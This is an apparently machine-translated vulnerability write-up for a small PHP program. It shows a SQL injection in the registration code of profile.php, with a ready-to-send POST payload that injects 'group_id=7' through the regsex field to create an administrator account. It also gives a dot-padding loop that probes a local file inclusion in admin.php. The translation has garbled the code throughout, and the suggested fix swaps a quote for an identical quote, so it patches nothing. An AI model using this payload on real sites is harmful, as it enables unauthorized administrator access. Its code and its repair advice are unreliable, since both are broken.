The problem occurs in profile. in the PHP file, $ reguser, $ regemail, $ reghomepage, $ regarea, $ regcomm, and $ regsex are filtered out to get an administrator privilege.
The Code is as follows:
The following is a reference clip:
If ($ action = 'reg '& $ reguser ){
If ($ Global ['hashto'] ['reg '] & (! $ Hashnum | $ hashnum <> $ _ SESSION [$ Global ['privprefix']. 'imghash']) $ C_errormsg. = '<li> Verification code error </li> ';
If (! Preg_match ("/^ ([\ x81-\ xfea-z0-9]) {} $/I", $ reguser) $ C_errormsg. = '<li> the user name must contain 3-12 Chinese letters or numbers </li> ';
If (! Eregi ("^ [_\. 0-9a-z-] + @ ([0-9a-z] [0-9a-z-] + \.) + [a-z] {2, 3} $ ", $ regemail) $ C_errormsg. = '<li> Email filled in incorrectly </li> ';
$ SQL = 'select user_id from '. _ TAB_USER __. "where ". $ Global ['mysql _ userow']. "= '". $ reguser. "'";
$ Result = $ db-> query ($ SQL );
If ($ rows = $ db-> fetch_row ($ result) $ C_errormsg. = '<li> the user name already exists </li> ';
$ SQL = 'select ban_id from '. _ TAB_BANLIST _. "where ban_name ='". $ reguser ."'";
$ Result = $ db-> query ($ SQL );
If ($ rows = $ db-> fetch_row ($ result) $ C_errormsg. = '<li> this user name has been disabled </li> ';
$ Db-> free_result ($ result );
If (! $ C_errormsg ){
$ SQL = 'insert '. _ TAB_USER __. "set ". $ Global ['mysql _ userow']. "= '$ reguser ',". $ Global ['mysql _ pwdrow']. "= '". md5 ($ regpwd ). "', user_email =' $ regemail ', user_qq = '". intval ($ regqq ). "', user_regdate = '". $ Global ['f _ time']. "', user_homepage =' $ reghomepage ', user_area =' $ regarea ', user_comm =' $ regcomm ', user_sex =' $ regsex ', user_publicemail = '". intval ($ publicmail ). "', group_id = 2 ";
Die ("\ r \ n". $ SQL );
If (! ($ Result = $ db-> query ($ SQL) back ('register data insertion failed ');
Manually capture the package and directly submit the POST:
The http://www.bkjia.com/phptest/Ckong2/CKong2.6/profile. php
Reguser = seraph3 & regpwd = seraph & regpwd2 = seraph & regemail = seraphsdflk2@dfc.om & publicmail = 1 & regsex = 1% d5 ', user_publicemail % 3d1, group_id % 3D7 # & regqq = 343434 & reghomepage = 1212121 & regarea = 121212 & regcomm = % CE % D2 % CA % B2 % C3 % B4 % D2 % B2 % B2 % BB
Repair Method:
$ Reghomepage = str_replace ("'", "'", $ reghomepage );
$ Regarea = str_replace ("'", "'", $ regarea );
$ Regcomm = str_replace ("'", "'", $ regcomm );
$ Regsex = str_replace ("'", "'", $ regsex );
I still can't trust GPC too much. It is more reliable to manually filter and filter by myself.
----------------------------- Split line of JJ -----------------------------
This program also has a local Inclusion Vulnerability.
After logging on locally, the code in admin. php is as follows:
The following is a reference clip:
<? Php
Ini_set ('max _ execution_time ', 0 );
$ Str = '';
For ($ I = 0; I I <1000; $ I ++)
{
$ Str = $ str .".";
$ Pfile = "create.txt ";
If (include_once ($ pfile. $ str. '. php') echo $ I;
}
?>
We hope you will discuss this issue together.
This set of programs is just a small program, and there may not be many people to use. It is a full technical exercise.